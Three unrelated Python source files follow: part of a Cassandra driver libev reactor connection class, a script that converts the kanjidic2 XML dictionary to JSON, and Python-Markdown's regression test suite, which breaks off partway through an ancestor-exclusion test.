def initialize_reactor(cls):
global _global_loop
if not _global_loop:
_global_loop = LibevLoop()
else:
if _global_loop._pid != os.getpid():
log.debug("Detected fork, clearing and reinitializing reactor state")
cls.handle_fork()
_global_loop = LibevLoop()
@classmethod
def handle_fork(cls):
global _global_loop
if _global_loop:
_global_loop._cleanup()
_global_loop = None
@classmethod
def create_timer(cls, timeout, callback):
timer = Timer(timeout, callback)
_global_loop.add_timer(timer)
return timer
def __init__(self, *args, **kwargs):
Connection.__init__(self, *args, **kwargs)
self.deque = deque()
self._deque_lock = Lock()
self._connect_socket()
self._socket.setblocking(0)
with _global_loop._lock:
self._read_watcher = libev.IO(self._socket.fileno(), libev.EV_READ, _global_loop._loop, self.handle_read)
self._write_watcher = libev.IO(self._socket.fileno(), libev.EV_WRITE, _global_loop._loop, self.handle_write)
self._send_options_message()
_global_loop.connection_created(self)
# start the global event loop if needed
_global_loop.maybe_start()
def close(self):
with self.lock:
if self.is_closed:
return
self.is_closed = True
log.debug("Closing connection (%s) to %s", id(self), self.endpoint)
_global_loop.connection_destroyed(self)
self._socket.close()
log.debug("Closed socket to %s", self.endpoint)
# don't leave in-progress operations hanging
if not self.is_defunct:
self.error_all_requests(
ConnectionShutdown("Connection to %s was closed" % self.endpoint))
def handle_write(self, watcher, revents, errno=None):
if revents & libev.EV_ERROR:
if errno:
exc = IOError(errno, os.strerror(errno))
else:
exc = Exception("libev reported an error")
self.defunct(exc)
return
while True:
try:
with self._deque_lock:
next_msg = self.deque.popleft()
except IndexError:
return
try:
sent = self._socket.send(next_msg)
except socket.error as err:
if (err.args[0] in NONBLOCKING or
err.args[0] in (ssl.SSL_ERROR_WANT_READ, ssl.SSL_ERROR_WANT_WRITE)):
with self._deque_lock:
self.deque.appendleft(next_msg)
else:
self.defunct(err)
return
else:
if sent < len(next_msg):
with self._deque_lock:
self.deque.appendleft(next_msg[sent:])
def handle_read(self, watcher, revents, errno=None):
if revents & libev.EV_ERROR:
if errno:
exc = IOError(errno, os.strerror(errno))
else:
exc = Exception("libev reported an error")
self.defunct(exc)
return
try:
while True:
buf = self._socket.recv(self.in_buffer_size)
self._iobuf.write(buf)
if len(buf) < self.in_buffer_size:
break
except socket.error as err:
if ssl and isinstance(err, ssl.SSLError):
if err.args[0] in (ssl.SSL_ERROR_WANT_READ, ssl.SSL_ERROR_WANT_WRITE):
return
else:
self.defunct(err)
return
elif err.args[0] in NONBLOCKING:
return
else:
self.defunct(err)
return
if self._iobuf.tell():
self.process_io_buffer()
else:
log.debug("Connection %s closed by server", self)
self.close()
def push(self, data):
sabs = self.out_buffer_size
if len(data) > sabs:
chunks = []
for i in range(0, len(data), sabs):
chunks.append(data[i:i + sabs])
else:
chunks = [data]
with self._deque_lock:
self.deque.extend(chunks)
_global_loop.notify()
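# Typical way for application code to select this reactor (mirrors the driver's
# documented usage; illustrative):
#   from cassandra.cluster import Cluster
#   from cassandra.io.libevreactor import LibevConnection
#   cluster = Cluster(connection_class=LibevConnection)
#   session = cluster.connect()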
|
the-stack_0_3778 | from xml.etree import ElementTree as ET
import re
import copy
import json
from tqdm import tqdm
FILE = 'kanjidic2.xml'
TEMPLATE = {
"kanji": "",
"strokes": 0,
"freq": None,
"jlpt": None,
"grade": 0,
"reading": {
"kun": [],
"on": []
},
"meaning": [],
"name_reading": []
}
def parse_misc(elements, new):
for ele in elements:
if ele.tag.lower() == "grade":
new['grade'] = ele.text
elif ele.tag.lower() == 'stroke_count':
new['strokes'] = ele.text
elif ele.tag.lower() == 'freq':
new['freq'] = ele.text
elif ele.tag.lower() == "jlpt":
new['jlpt'] = ele.text
def parse_literal(elements, new):
new['kanji'] = elements.text
def parse_rmgroup(elements, new):
for ele in elements:
if ele.tag.lower() == "reading":
if ele.attrib:
if ele.attrib['r_type'] == "ja_on":
new['reading']['on'].append(ele.text)
elif ele.attrib['r_type'] == "ja_kun":
new['reading']['kun'].append(ele.text)
elif ele.tag.lower() == "meaning":
if ele.attrib:
if ele.attrib['m_lang'] == "en":
new["meaning"].append(ele.text)
else:
new['meaning'].append(ele.text)
def parse_readings(elements, new):
for ele in elements:
if ele.tag.lower() == "rmgroup":
parse_rmgroup(ele, new)
elif ele.tag.lower() == "nanori":
new['name_reading'].append(ele.text)
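# For reference, each <character> element handled above is shaped roughly like this
# (abridged; values are illustrative):
#   <character>
#     <literal>亜</literal>
#     <misc><grade>8</grade><stroke_count>7</stroke_count><freq>1509</freq><jlpt>1</jlpt></misc>
#     <reading_meaning>
#       <rmgroup>
#         <reading r_type="ja_on">ア</reading>
#         <meaning>Asia</meaning>
#       </rmgroup>
#       <nanori>や</nanori>
#     </reading_meaning>
#   </character>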
def xml_parser():
    """Parse kanjidic2.xml and return {"words": [...]}, one TEMPLATE-shaped dict per kanji."""
f = ET.iterparse(FILE)
DATA = []
for event, elements in tqdm(f):
if event == 'end' and elements.tag == 'character':
new_ele = copy.deepcopy(TEMPLATE)
for ele in elements.iter():
if ele.tag.lower() == "literal":
parse_literal(ele, new_ele)
elif ele.tag.lower() == "reading_meaning":
parse_readings(ele, new_ele)
elif ele.tag.lower() == "misc":
parse_misc(ele, new_ele)
DATA.append(new_ele)
return {"words": DATA}
def xml_to_json():
""" Convert xml to json and save to file """
file = open("Kanjidic.json", "w", encoding="utf8")
print("Beginning conversion of Kanjidic")
json.dump(xml_parser(), file, indent=2, ensure_ascii=False)
print("Conversion finished")
print("Saving to file...")
file.close()
if __name__ == "__main__":
xml_to_json() |
the-stack_0_3779 | """
Python Markdown
A Python implementation of John Gruber's Markdown.
Documentation: https://python-markdown.github.io/
GitHub: https://github.com/Python-Markdown/markdown/
PyPI: https://pypi.org/project/Markdown/
Started by Manfred Stienstra (http://www.dwerg.net/).
Maintained for a few years by Yuri Takhteyev (http://www.freewisdom.org).
Currently maintained by Waylan Limberg (https://github.com/waylan),
Dmitry Shachnev (https://github.com/mitya57) and Isaac Muse (https://github.com/facelessuser).
Copyright 2007-2018 The Python Markdown Project (v. 1.7 and later)
Copyright 2004, 2005, 2006 Yuri Takhteyev (v. 0.2-1.6b)
Copyright 2004 Manfred Stienstra (the original version)
License: BSD (see LICENSE.md for details).
Python-Markdown Regression Tests
================================
Tests of the various APIs with the python markdown lib.
"""
import unittest
import sys
import os
import markdown
import warnings
from markdown.__main__ import parse_options
from logging import DEBUG, WARNING, CRITICAL
import yaml
import tempfile
from io import BytesIO
import xml.etree.ElementTree as etree
from xml.etree.ElementTree import ProcessingInstruction
class TestMarkdownBasics(unittest.TestCase):
""" Tests basics of the Markdown class. """
def setUp(self):
""" Create instance of Markdown. """
self.md = markdown.Markdown()
def testBlankInput(self):
""" Test blank input. """
self.assertEqual(self.md.convert(''), '')
def testWhitespaceOnly(self):
""" Test input of only whitespace. """
self.assertEqual(self.md.convert(' '), '')
def testSimpleInput(self):
""" Test simple input. """
self.assertEqual(self.md.convert('foo'), '<p>foo</p>')
def testInstanceExtension(self):
""" Test Extension loading with a class instance. """
from markdown.extensions.footnotes import FootnoteExtension
markdown.Markdown(extensions=[FootnoteExtension()])
def testEntryPointExtension(self):
""" Test Extension loading with an entry point. """
markdown.Markdown(extensions=['footnotes'])
def testDotNotationExtension(self):
""" Test Extension loading with Name (`path.to.module`). """
markdown.Markdown(extensions=['markdown.extensions.footnotes'])
def testDotNotationExtensionWithClass(self):
""" Test Extension loading with class name (`path.to.module:Class`). """
markdown.Markdown(extensions=['markdown.extensions.footnotes:FootnoteExtension'])
class TestConvertFile(unittest.TestCase):
""" Tests of ConvertFile. """
def setUp(self):
self.saved = sys.stdin, sys.stdout
sys.stdin = BytesIO(bytes('foo', encoding='utf-8'))
sys.stdout = BytesIO()
def tearDown(self):
sys.stdin, sys.stdout = self.saved
def getTempFiles(self, src):
""" Return the file names for two temp files. """
infd, infile = tempfile.mkstemp(suffix='.txt')
with os.fdopen(infd, 'w') as fp:
fp.write(src)
outfd, outfile = tempfile.mkstemp(suffix='.html')
return infile, outfile, outfd
def testFileNames(self):
infile, outfile, outfd = self.getTempFiles('foo')
markdown.markdownFromFile(input=infile, output=outfile)
with os.fdopen(outfd, 'r') as fp:
output = fp.read()
self.assertEqual(output, '<p>foo</p>')
def testFileObjects(self):
infile = BytesIO(bytes('foo', encoding='utf-8'))
outfile = BytesIO()
markdown.markdownFromFile(input=infile, output=outfile)
outfile.seek(0)
self.assertEqual(outfile.read().decode('utf-8'), '<p>foo</p>')
def testStdinStdout(self):
markdown.markdownFromFile()
sys.stdout.seek(0)
self.assertEqual(sys.stdout.read().decode('utf-8'), '<p>foo</p>')
class TestBlockParser(unittest.TestCase):
""" Tests of the BlockParser class. """
def setUp(self):
""" Create instance of BlockParser. """
self.parser = markdown.Markdown().parser
def testParseChunk(self):
""" Test BlockParser.parseChunk. """
root = etree.Element("div")
text = 'foo'
self.parser.parseChunk(root, text)
self.assertEqual(
markdown.serializers.to_xhtml_string(root),
"<div><p>foo</p></div>"
)
def testParseDocument(self):
""" Test BlockParser.parseDocument. """
lines = ['#foo', '', 'bar', '', ' baz']
tree = self.parser.parseDocument(lines)
self.assertIsInstance(tree, etree.ElementTree)
self.assertIs(etree.iselement(tree.getroot()), True)
self.assertEqual(
markdown.serializers.to_xhtml_string(tree.getroot()),
"<div><h1>foo</h1><p>bar</p><pre><code>baz\n</code></pre></div>"
)
class TestBlockParserState(unittest.TestCase):
""" Tests of the State class for BlockParser. """
def setUp(self):
self.state = markdown.blockparser.State()
def testBlankState(self):
""" Test State when empty. """
self.assertEqual(self.state, [])
def testSetSate(self):
""" Test State.set(). """
self.state.set('a_state')
self.assertEqual(self.state, ['a_state'])
self.state.set('state2')
self.assertEqual(self.state, ['a_state', 'state2'])
def testIsSate(self):
""" Test State.isstate(). """
self.assertEqual(self.state.isstate('anything'), False)
self.state.set('a_state')
self.assertEqual(self.state.isstate('a_state'), True)
self.state.set('state2')
self.assertEqual(self.state.isstate('state2'), True)
self.assertEqual(self.state.isstate('a_state'), False)
self.assertEqual(self.state.isstate('missing'), False)
def testReset(self):
""" Test State.reset(). """
self.state.set('a_state')
self.state.reset()
self.assertEqual(self.state, [])
self.state.set('state1')
self.state.set('state2')
self.state.reset()
self.assertEqual(self.state, ['state1'])
class TestHtmlStash(unittest.TestCase):
""" Test Markdown's HtmlStash. """
def setUp(self):
self.stash = markdown.util.HtmlStash()
self.placeholder = self.stash.store('foo')
def testSimpleStore(self):
""" Test HtmlStash.store. """
self.assertEqual(self.placeholder, self.stash.get_placeholder(0))
self.assertEqual(self.stash.html_counter, 1)
self.assertEqual(self.stash.rawHtmlBlocks, ['foo'])
def testStoreMore(self):
""" Test HtmlStash.store with additional blocks. """
placeholder = self.stash.store('bar')
self.assertEqual(placeholder, self.stash.get_placeholder(1))
self.assertEqual(self.stash.html_counter, 2)
self.assertEqual(
self.stash.rawHtmlBlocks,
['foo', 'bar']
)
def testReset(self):
""" Test HtmlStash.reset. """
self.stash.reset()
self.assertEqual(self.stash.html_counter, 0)
self.assertEqual(self.stash.rawHtmlBlocks, [])
class Item:
""" A dummy Registry item object for testing. """
def __init__(self, data):
self.data = data
def __repr__(self):
return repr(self.data)
def __eq__(self, other):
return self.data == other
class RegistryTests(unittest.TestCase):
""" Test the processor registry. """
def testCreateRegistry(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
self.assertEqual(len(r), 1)
self.assertIsInstance(r, markdown.util.Registry)
def testRegisterWithoutPriority(self):
r = markdown.util.Registry()
with self.assertRaises(TypeError):
r.register(Item('a'))
def testSortRegistry(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 21)
r.register(Item('c'), 'c', 20.5)
self.assertEqual(len(r), 3)
self.assertEqual(list(r), ['b', 'c', 'a'])
def testIsSorted(self):
r = markdown.util.Registry()
self.assertIs(r._is_sorted, False)
r.register(Item('a'), 'a', 20)
list(r)
self.assertIs(r._is_sorted, True)
r.register(Item('b'), 'b', 21)
self.assertIs(r._is_sorted, False)
r['a']
self.assertIs(r._is_sorted, True)
r._is_sorted = False
r.get_index_for_name('a')
self.assertIs(r._is_sorted, True)
r._is_sorted = False
repr(r)
self.assertIs(r._is_sorted, True)
def testDeregister(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 30)
r.register(Item('c'), 'c', 40)
self.assertEqual(len(r), 3)
r.deregister('b')
self.assertEqual(len(r), 2)
r.deregister('c', strict=False)
self.assertEqual(len(r), 1)
# deregister non-existent item with strict=False
r.deregister('d', strict=False)
self.assertEqual(len(r), 1)
with self.assertRaises(ValueError):
# deregister non-existent item with strict=True
r.deregister('e')
self.assertEqual(list(r), ['a'])
def testRegistryContains(self):
r = markdown.util.Registry()
item = Item('a')
r.register(item, 'a', 20)
self.assertIs('a' in r, True)
self.assertIn(item, r)
self.assertNotIn('b', r)
def testRegistryIter(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 30)
self.assertEqual(list(r), ['b', 'a'])
def testRegistryGetItemByIndex(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 30)
self.assertEqual(r[0], 'b')
self.assertEqual(r[1], 'a')
with self.assertRaises(IndexError):
r[3]
def testRegistryGetItemByItem(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 30)
self.assertEqual(r['a'], 'a')
self.assertEqual(r['b'], 'b')
with self.assertRaises(KeyError):
r['c']
def testRegistrySetItem(self):
r = markdown.util.Registry()
with self.assertRaises(TypeError):
r[0] = 'a'
with self.assertRaises(TypeError):
r['a'] = 'a'
def testRegistryDelItem(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
with self.assertRaises(TypeError):
del r[0]
with self.assertRaises(TypeError):
del r['a']
def testRegistrySlice(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 30)
r.register(Item('c'), 'c', 40)
slc = r[1:]
self.assertEqual(len(slc), 2)
self.assertIsInstance(slc, markdown.util.Registry)
self.assertEqual(list(slc), ['b', 'a'])
def testGetIndexForName(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 30)
self.assertEqual(r.get_index_for_name('a'), 1)
self.assertEqual(r.get_index_for_name('b'), 0)
with self.assertRaises(ValueError):
r.get_index_for_name('c')
def testRegisterDupplicate(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b1'), 'b', 10)
self.assertEqual(list(r), ['a', 'b1'])
self.assertEqual(len(r), 2)
r.register(Item('b2'), 'b', 30)
self.assertEqual(len(r), 2)
self.assertEqual(list(r), ['b2', 'a'])
class TestErrors(unittest.TestCase):
""" Test Error Reporting. """
def setUp(self):
# Set warnings to be raised as errors
warnings.simplefilter('error')
def tearDown(self):
# Reset warning behavior back to default
warnings.simplefilter('default')
def testBadOutputFormat(self):
""" Test failure on bad output_format. """
self.assertRaises(KeyError, markdown.Markdown, output_format='invalid')
def testLoadExtensionFailure(self):
""" Test failure of an extension to load. """
self.assertRaises(
ImportError,
markdown.Markdown, extensions=['non_existant_ext']
)
def testLoadBadExtension(self):
""" Test loading of an Extension with no makeExtension function. """
self.assertRaises(AttributeError, markdown.Markdown, extensions=['markdown.util'])
def testNonExtension(self):
""" Test loading a non Extension object as an extension. """
self.assertRaises(TypeError, markdown.Markdown, extensions=[object])
def testDotNotationExtensionWithBadClass(self):
""" Test Extension loading with non-existent class name (`path.to.module:Class`). """
self.assertRaises(
AttributeError,
markdown.Markdown,
extensions=['markdown.extensions.footnotes:MissingExtension']
)
def testBaseExtention(self):
""" Test that the base Extension class will raise NotImplemented. """
self.assertRaises(
NotImplementedError,
markdown.Markdown, extensions=[markdown.extensions.Extension()]
)
class testETreeComments(unittest.TestCase):
"""
Test that ElementTree Comments work.
These tests should only be a concern when using cElementTree with third
party serializers (including markdown's (x)html serializer). While markdown
doesn't use ElementTree.Comment itself, we should certainly support any
third party extensions which may. Therefore, these tests are included to
ensure such support is maintained.
"""
def setUp(self):
# Create comment node
self.comment = etree.Comment('foo')
def testCommentIsComment(self):
""" Test that an ElementTree Comment passes the `is Comment` test. """
self.assertIs(self.comment.tag, etree.Comment)
def testCommentIsBlockLevel(self):
""" Test that an ElementTree Comment is recognized as BlockLevel. """
md = markdown.Markdown()
self.assertIs(md.is_block_level(self.comment.tag), False)
def testCommentSerialization(self):
""" Test that an ElementTree Comment serializes properly. """
self.assertEqual(
markdown.serializers.to_html_string(self.comment),
'<!--foo-->'
)
def testCommentPrettify(self):
""" Test that an ElementTree Comment is prettified properly. """
pretty = markdown.treeprocessors.PrettifyTreeprocessor(markdown.Markdown())
pretty.run(self.comment)
self.assertEqual(
markdown.serializers.to_html_string(self.comment),
'<!--foo-->\n'
)
class testElementTailTests(unittest.TestCase):
""" Element Tail Tests """
def setUp(self):
self.pretty = markdown.treeprocessors.PrettifyTreeprocessor(markdown.Markdown())
def testBrTailNoNewline(self):
""" Test that last <br> in tree has a new line tail """
root = etree.Element('root')
br = etree.SubElement(root, 'br')
self.assertEqual(br.tail, None)
self.pretty.run(root)
self.assertEqual(br.tail, "\n")
class testElementPreCodeTests(unittest.TestCase):
""" Element PreCode Tests """
def setUp(self):
md = markdown.Markdown()
self.pretty = markdown.treeprocessors.PrettifyTreeprocessor(md)
def prettify(self, xml):
root = etree.fromstring(xml)
self.pretty.run(root)
return etree.tostring(root, encoding="unicode", short_empty_elements=False)
def testPreCodeEmpty(self):
xml = "<pre><code></code></pre>"
expected = "<pre><code></code></pre>\n"
self.assertEqual(expected, self.prettify(xml))
def testPreCodeWithChildren(self):
xml = "<pre><code> <span /></code></pre>"
expected = "<pre><code> <span></span></code></pre>\n"
self.assertEqual(expected, self.prettify(xml))
def testPreCodeWithSpaceOnly(self):
xml = "<pre><code> </code></pre>"
expected = "<pre><code>\n</code></pre>\n"
self.assertEqual(expected, self.prettify(xml))
def testPreCodeWithText(self):
xml = "<pre><code> hello</code></pre>"
expected = "<pre><code> hello\n</code></pre>\n"
self.assertEqual(expected, self.prettify(xml))
def testPreCodeWithTrailingSpace(self):
xml = "<pre><code> hello </code></pre>"
expected = "<pre><code> hello\n</code></pre>\n"
self.assertEqual(expected, self.prettify(xml))
class testSerializers(unittest.TestCase):
""" Test the html and xhtml serializers. """
def testHtml(self):
""" Test HTML serialization. """
el = etree.Element('div')
el.set('id', 'foo<&">')
p = etree.SubElement(el, 'p')
p.text = 'foo <&escaped>'
p.set('hidden', 'hidden')
etree.SubElement(el, 'hr')
non_element = etree.SubElement(el, None)
non_element.text = 'non-element text'
script = etree.SubElement(non_element, 'script')
script.text = '<&"test\nescaping">'
el.tail = "tail text"
self.assertEqual(
markdown.serializers.to_html_string(el),
'<div id="foo<&">">'
'<p hidden>foo <&escaped></p>'
'<hr>'
'non-element text'
'<script><&"test\nescaping"></script>'
'</div>tail text'
)
def testXhtml(self):
"""" Test XHTML serialization. """
el = etree.Element('div')
el.set('id', 'foo<&">')
p = etree.SubElement(el, 'p')
p.text = 'foo<&escaped>'
p.set('hidden', 'hidden')
etree.SubElement(el, 'hr')
non_element = etree.SubElement(el, None)
non_element.text = 'non-element text'
script = etree.SubElement(non_element, 'script')
script.text = '<&"test\nescaping">'
el.tail = "tail text"
self.assertEqual(
markdown.serializers.to_xhtml_string(el),
'<div id="foo<&">">'
'<p hidden="hidden">foo<&escaped></p>'
'<hr />'
'non-element text'
'<script><&"test\nescaping"></script>'
'</div>tail text'
)
def testMixedCaseTags(self):
"""" Test preservation of tag case. """
el = etree.Element('MixedCase')
el.text = 'not valid '
em = etree.SubElement(el, 'EMPHASIS')
em.text = 'html'
etree.SubElement(el, 'HR')
self.assertEqual(
markdown.serializers.to_xhtml_string(el),
'<MixedCase>not valid <EMPHASIS>html</EMPHASIS><HR /></MixedCase>'
)
def testProsessingInstruction(self):
""" Test serialization of ProcessignInstruction. """
pi = ProcessingInstruction('foo', text='<&"test\nescaping">')
self.assertIs(pi.tag, ProcessingInstruction)
self.assertEqual(
markdown.serializers.to_xhtml_string(pi),
'<?foo <&"test\nescaping">?>'
)
def testQNameTag(self):
""" Test serialization of QName tag. """
div = etree.Element('div')
qname = etree.QName('http://www.w3.org/1998/Math/MathML', 'math')
math = etree.SubElement(div, qname)
math.set('display', 'block')
sem = etree.SubElement(math, 'semantics')
msup = etree.SubElement(sem, 'msup')
mi = etree.SubElement(msup, 'mi')
mi.text = 'x'
mn = etree.SubElement(msup, 'mn')
mn.text = '2'
ann = etree.SubElement(sem, 'annotations')
ann.text = 'x^2'
self.assertEqual(
markdown.serializers.to_xhtml_string(div),
'<div>'
'<math display="block" xmlns="http://www.w3.org/1998/Math/MathML">'
'<semantics>'
'<msup>'
'<mi>x</mi>'
'<mn>2</mn>'
'</msup>'
'<annotations>x^2</annotations>'
'</semantics>'
'</math>'
'</div>'
)
def testQNameAttribute(self):
""" Test serialization of QName attribute. """
div = etree.Element('div')
div.set(etree.QName('foo'), etree.QName('bar'))
self.assertEqual(
markdown.serializers.to_xhtml_string(div),
'<div foo="bar"></div>'
)
def testBadQNameTag(self):
""" Test serialization of QName with no tag. """
qname = etree.QName('http://www.w3.org/1998/Math/MathML')
el = etree.Element(qname)
self.assertRaises(ValueError, markdown.serializers.to_xhtml_string, el)
def testQNameEscaping(self):
""" Test QName escaping. """
qname = etree.QName('<&"test\nescaping">', 'div')
el = etree.Element(qname)
self.assertEqual(
markdown.serializers.to_xhtml_string(el),
'<div xmlns="<&"test escaping">"></div>'
)
def testQNamePreEscaping(self):
""" Test QName that is already partially escaped. """
qname = etree.QName('<&"test escaping">', 'div')
el = etree.Element(qname)
self.assertEqual(
markdown.serializers.to_xhtml_string(el),
'<div xmlns="<&"test escaping">"></div>'
)
def buildExtension(self):
""" Build an extension which registers fakeSerializer. """
def fakeSerializer(elem):
# Ignore input and return hardcoded output
return '<div><p>foo</p></div>'
class registerFakeSerializer(markdown.extensions.Extension):
def extendMarkdown(self, md):
md.output_formats['fake'] = fakeSerializer
return registerFakeSerializer()
def testRegisterSerializer(self):
self.assertEqual(
markdown.markdown(
'baz', extensions=[self.buildExtension()], output_format='fake'
),
'<p>foo</p>'
)
def testXHTMLOutput(self):
self.assertEqual(
markdown.markdown('foo \nbar', output_format='xhtml'),
'<p>foo<br />\nbar</p>'
)
def testHTMLOutput(self):
self.assertEqual(
markdown.markdown('foo \nbar', output_format='html'),
'<p>foo<br>\nbar</p>'
)
class testAtomicString(unittest.TestCase):
""" Test that AtomicStrings are honored (not parsed). """
def setUp(self):
md = markdown.Markdown()
self.inlineprocessor = md.treeprocessors['inline']
def testString(self):
""" Test that a regular string is parsed. """
tree = etree.Element('div')
p = etree.SubElement(tree, 'p')
p.text = 'some *text*'
new = self.inlineprocessor.run(tree)
self.assertEqual(
markdown.serializers.to_html_string(new),
'<div><p>some <em>text</em></p></div>'
)
def testSimpleAtomicString(self):
""" Test that a simple AtomicString is not parsed. """
tree = etree.Element('div')
p = etree.SubElement(tree, 'p')
p.text = markdown.util.AtomicString('some *text*')
new = self.inlineprocessor.run(tree)
self.assertEqual(
markdown.serializers.to_html_string(new),
'<div><p>some *text*</p></div>'
)
def testNestedAtomicString(self):
""" Test that a nested AtomicString is not parsed. """
tree = etree.Element('div')
p = etree.SubElement(tree, 'p')
p.text = markdown.util.AtomicString('*some* ')
span1 = etree.SubElement(p, 'span')
span1.text = markdown.util.AtomicString('*more* ')
span2 = etree.SubElement(span1, 'span')
span2.text = markdown.util.AtomicString('*text* ')
span3 = etree.SubElement(span2, 'span')
span3.text = markdown.util.AtomicString('*here*')
span3.tail = markdown.util.AtomicString(' *to*')
span2.tail = markdown.util.AtomicString(' *test*')
span1.tail = markdown.util.AtomicString(' *with*')
new = self.inlineprocessor.run(tree)
self.assertEqual(
markdown.serializers.to_html_string(new),
'<div><p>*some* <span>*more* <span>*text* <span>*here*</span> '
'*to*</span> *test*</span> *with*</p></div>'
)
class TestConfigParsing(unittest.TestCase):
def assertParses(self, value, result):
self.assertIs(markdown.util.parseBoolValue(value, False), result)
def testBooleansParsing(self):
self.assertParses(True, True)
self.assertParses('novalue', None)
self.assertParses('yES', True)
self.assertParses('FALSE', False)
self.assertParses(0., False)
self.assertParses('none', False)
def testPreserveNone(self):
self.assertIsNone(markdown.util.parseBoolValue('None', preserve_none=True))
self.assertIsNone(markdown.util.parseBoolValue(None, preserve_none=True))
def testInvalidBooleansParsing(self):
self.assertRaises(ValueError, markdown.util.parseBoolValue, 'novalue')
class TestCliOptionParsing(unittest.TestCase):
""" Test parsing of Command Line Interface Options. """
def setUp(self):
self.default_options = {
'input': None,
'output': None,
'encoding': None,
'output_format': 'xhtml',
'lazy_ol': True,
'extensions': [],
'extension_configs': {},
}
self.tempfile = ''
def tearDown(self):
if os.path.isfile(self.tempfile):
os.remove(self.tempfile)
def testNoOptions(self):
options, logging_level = parse_options([])
self.assertEqual(options, self.default_options)
self.assertEqual(logging_level, CRITICAL)
def testQuietOption(self):
options, logging_level = parse_options(['-q'])
self.assertGreater(logging_level, CRITICAL)
def testVerboseOption(self):
options, logging_level = parse_options(['-v'])
self.assertEqual(logging_level, WARNING)
def testNoisyOption(self):
options, logging_level = parse_options(['--noisy'])
self.assertEqual(logging_level, DEBUG)
def testInputFileOption(self):
options, logging_level = parse_options(['foo.txt'])
self.default_options['input'] = 'foo.txt'
self.assertEqual(options, self.default_options)
def testOutputFileOption(self):
options, logging_level = parse_options(['-f', 'foo.html'])
self.default_options['output'] = 'foo.html'
self.assertEqual(options, self.default_options)
def testInputAndOutputFileOptions(self):
options, logging_level = parse_options(['-f', 'foo.html', 'foo.txt'])
self.default_options['output'] = 'foo.html'
self.default_options['input'] = 'foo.txt'
self.assertEqual(options, self.default_options)
def testEncodingOption(self):
options, logging_level = parse_options(['-e', 'utf-8'])
self.default_options['encoding'] = 'utf-8'
self.assertEqual(options, self.default_options)
def testOutputFormatOption(self):
options, logging_level = parse_options(['-o', 'html'])
self.default_options['output_format'] = 'html'
self.assertEqual(options, self.default_options)
def testNoLazyOlOption(self):
options, logging_level = parse_options(['-n'])
self.default_options['lazy_ol'] = False
self.assertEqual(options, self.default_options)
def testExtensionOption(self):
options, logging_level = parse_options(['-x', 'markdown.extensions.footnotes'])
self.default_options['extensions'] = ['markdown.extensions.footnotes']
self.assertEqual(options, self.default_options)
def testMultipleExtensionOptions(self):
options, logging_level = parse_options([
'-x', 'markdown.extensions.footnotes',
'-x', 'markdown.extensions.smarty'
])
self.default_options['extensions'] = [
'markdown.extensions.footnotes',
'markdown.extensions.smarty'
]
self.assertEqual(options, self.default_options)
def create_config_file(self, config):
""" Helper to create temp config files. """
if not isinstance(config, str):
# convert to string
config = yaml.dump(config)
fd, self.tempfile = tempfile.mkstemp('.yml')
with os.fdopen(fd, 'w') as fp:
fp.write(config)
def testExtensionConfigOption(self):
config = {
'markdown.extensions.wikilinks': {
'base_url': 'http://example.com/',
'end_url': '.html',
'html_class': 'test',
},
'markdown.extensions.footnotes:FootnotesExtension': {
'PLACE_MARKER': '~~~footnotes~~~'
}
}
self.create_config_file(config)
options, logging_level = parse_options(['-c', self.tempfile])
self.default_options['extension_configs'] = config
self.assertEqual(options, self.default_options)
    def testBoolExtensionConfigOption(self):
config = {
'markdown.extensions.toc': {
'title': 'Some Title',
'anchorlink': True,
'permalink': True
}
}
self.create_config_file(config)
options, logging_level = parse_options(['-c', self.tempfile])
self.default_options['extension_configs'] = config
self.assertEqual(options, self.default_options)
def testExtensionConfigOptionAsJSON(self):
config = {
'markdown.extensions.wikilinks': {
'base_url': 'http://example.com/',
'end_url': '.html',
'html_class': 'test',
},
'markdown.extensions.footnotes:FootnotesExtension': {
'PLACE_MARKER': '~~~footnotes~~~'
}
}
import json
self.create_config_file(json.dumps(config))
options, logging_level = parse_options(['-c', self.tempfile])
self.default_options['extension_configs'] = config
self.assertEqual(options, self.default_options)
def testExtensionConfigOptionMissingFile(self):
self.assertRaises(IOError, parse_options, ['-c', 'missing_file.yaml'])
def testExtensionConfigOptionBadFormat(self):
config = """
[footnotes]
PLACE_MARKER= ~~~footnotes~~~
"""
self.create_config_file(config)
self.assertRaises(yaml.YAMLError, parse_options, ['-c', self.tempfile])
class TestEscapeAppend(unittest.TestCase):
""" Tests escape character append. """
def testAppend(self):
""" Test that appended escapes are only in the current instance. """
md = markdown.Markdown()
md.ESCAPED_CHARS.append('|')
self.assertEqual('|' in md.ESCAPED_CHARS, True)
md2 = markdown.Markdown()
self.assertEqual('|' not in md2.ESCAPED_CHARS, True)
class TestBlockAppend(unittest.TestCase):
""" Tests block kHTML append. """
def testBlockAppend(self):
""" Test that appended escapes are only in the current instance. """
md = markdown.Markdown()
md.block_level_elements.append('test')
self.assertEqual('test' in md.block_level_elements, True)
md2 = markdown.Markdown()
self.assertEqual('test' not in md2.block_level_elements, True)
class TestAncestorExclusion(unittest.TestCase):
""" Tests exclusion of tags in ancestor list. """
class AncestorExample(markdown.inlinepatterns.SimpleTagInlineProcessor):
""" Ancestor Test. """
ANCESTOR_EXCLUDES = ('a',)
def handleMatch(self, m, data):
""" Handle match. """
el = etree.Element(self.tag)
el.text = m.group(2)
return el, m.start(0), m.end(0)
class AncestorExtension(markdown.Extension):
def __init__(self, *args, **kwargs):
"""Initialize."""
self.config = {}
def extendMarkdown(self, md):
"""Modify inline patterns."""
pattern = r'(\+)([^\+]+)\1'
md.inlinePatterns.register(TestAncestorExclusion.AncestorExample(pattern, 'strong'), 'ancestor-test', 0)
def setUp(self):
"""Setup markdown object."""
self.md = markdown.Markdown(extensions=[TestAncestorExclusion.AncestorExtension()])
def test_ancestors(self):
""" Test that an extension can exclude parent tags. """
test = """
